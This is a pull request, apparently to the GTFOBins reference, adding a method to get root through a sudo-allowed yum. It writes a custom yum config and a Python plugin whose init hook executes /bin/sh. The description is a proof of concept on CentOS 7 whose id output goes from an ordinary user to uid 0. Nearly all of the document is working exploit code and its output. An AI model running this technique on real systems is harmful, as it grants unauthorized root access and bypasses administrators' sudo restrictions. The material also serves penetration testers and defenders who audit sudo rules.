### PR TITLE
Update sudo yum by loading a custom plugin

### DIFF
--- a/_gtfobins/yum.md
+++ b/_gtfobins/yum.md
@@ -10,4 +10,30 @@ functions:
         ```
       code: |
         sudo yum localinstall -y x-1.0-1.noarch.rpm
+    - description: |
+        Spawn interactive root shell by loading a custom plugin.
+      code: |
+        TF=$(mktemp -d)
+        cat >$TF/x<<EOF
+        [main]
+        plugins=1
+        pluginpath=$TF
+        pluginconfpath=$TF
+        EOF
+
+        cat >$TF/y.conf<<EOF
+        [main]
+        enabled=1
+        EOF
+
+        cat >$TF/y.py<<EOF
+        import os
+        import yum
+        from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
+        requires_api_version='2.1'
+        def init_hook(conduit):
+          os.execl('/bin/sh','/bin/sh')
+        EOF
+
+        sudo yum -c $TF/x --enableplugin=y
 ---


### PR DESCRIPTION
PoC on CentOS
```
[user1@localhost ~]$ cat /etc/redhat-release
CentOS Linux release 7.6.1810 (Core)

[user1@localhost ~]$ sudo -ll
Matching Defaults entries for user1 on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on localhost:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
	/usr/bin/yum

[user1@localhost ~]$ cat yum.conf
[main]
plugins=1
pluginpath=/home/user1
pluginconfpath=/home/user1

[user1@localhost ~]$ cat woot.conf
[main]
enabled=1

[user1@localhost ~]$ cat woot.py
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE

requires_api_version='2.1'

def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')

[user1@localhost ~]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[user1@localhost ~]$ sudo yum -c yum.conf --enableplugin=$PWD/woot
Configuration file /home/user1/python-shell.conf not found
Unable to find configuration file for plugin python-shell
Loaded plugins: woot
No plugin match for: /home/user1/woot
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#
```